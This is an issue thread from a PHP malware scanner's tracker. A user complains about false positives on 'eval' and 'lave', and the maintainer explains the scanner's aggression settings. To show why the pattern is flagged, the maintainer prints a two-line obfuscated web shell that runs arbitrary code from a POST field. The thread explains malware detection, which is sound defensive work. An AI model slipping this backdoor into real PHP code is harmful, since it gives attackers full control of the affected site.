too many false positives.

[oantonioo]

It is impossible to use this scanner.
Is any word with 'eval' or 'lave' a malware?
and like this many more, I have wasted half an hour scanning and reviewing and they are all false positives.

[marcocesarato]

It is not uncommon for antivirus software to flag legitimate code as malware due to certain strings or patterns, such as the presence of "eval" or "lave". As such, before classifying the flagged code as malware, it's essential to scrutinize it carefully and comprehend its purpose.

For this the software offers different aggression levels, as provided in the documentation. Depending on the scanned code, you can use php amwscan --only-signatures or php amwscan --only-exploits to reduce the number of false positives.

Examples of eval malwares:

https://github.com/marcocesarato/PHP-Malware-Collection/blob/b23b4a3106caadf85e6e897b2db0b38c451b2b82/real/ice.php#LL1C1-L1C33

---

The code below reverses the string "eval" to create the variable name "$b" and then uses it to execute any code provided via POST request. This can be a potential security risk as it allows arbitrary code execution.

$b = strrev("lave");
$b($_POST['evilcode']);